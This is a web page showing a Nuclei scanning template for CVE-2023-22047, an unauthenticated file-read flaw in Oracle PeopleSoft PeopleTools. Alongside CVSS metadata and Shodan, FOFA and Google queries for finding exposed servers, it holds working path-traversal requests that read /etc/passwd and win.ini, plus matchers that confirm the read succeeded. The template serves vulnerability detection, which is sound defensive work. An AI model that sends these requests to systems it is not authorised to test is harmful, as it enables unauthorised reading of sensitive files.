Skip to content

Oracle Peoplesoft - Unauthenticated File Read

ID: CVE-2023-22047

Severity: high

Author: tuo4n8

Tags: cve,cve2023,oracle,peoplesoft,lfi

Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component- Portal). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data.

id: CVE-2023-22047
info:
name: Oracle Peoplesoft - Unauthenticated File Read
author: tuo4n8
severity: high
description: |
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component- Portal). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-22047
- https://x.com/tuo4n8/status/1907279143517266286
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-22047
epss-score: 0.00635
epss-percentile: 0.68045
cpe: cpe:2.3:a:oracle:peoplesoft_enterprise:8.59:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: oracle
product: peoplesoft_enterprise
shodan-query: http.title:"oracle peoplesoft enterprise"
fofa-query: title="oracle peoplesoft enterprise"
google-query: intitle:"oracle peoplesoft enterprise"
tags: cve,cve2023,oracle,peoplesoft,lfi
http:
- method: GET
path:
- "{{BaseURL}}/RP?wsrp-url=file:///etc/passwd"
- "{{BaseURL}}/RP?wsrp-url=file:///c:\\windows\\win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "bit app support"
condition: or
- type: word
part: content_type
words:
- "content/unknown"
- type: status
status:
- 200
# digest: 4a0a0047304502200ab3170bbae2d2e9657225a05ba094497379a502cec6252057ee6fc18b453003022100badc351ea4fd801ddd545919de40ca88937a6ee92c3d17c03e8e8daf7cc846cd:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-22047.yaml"

View on Github